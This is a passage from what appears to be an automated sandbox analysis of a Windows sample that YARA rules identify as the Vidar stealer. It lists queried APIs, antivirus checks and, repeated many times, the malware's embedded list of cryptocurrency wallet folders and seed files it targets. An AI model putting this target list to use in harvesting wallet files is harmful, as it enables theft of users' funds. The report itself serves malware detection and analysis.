                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 0_2_005E43A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005E43A3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930C28 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00930C28
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00930D03
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD8390 NSS_GetVersion,2_2_6CAD8390
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local 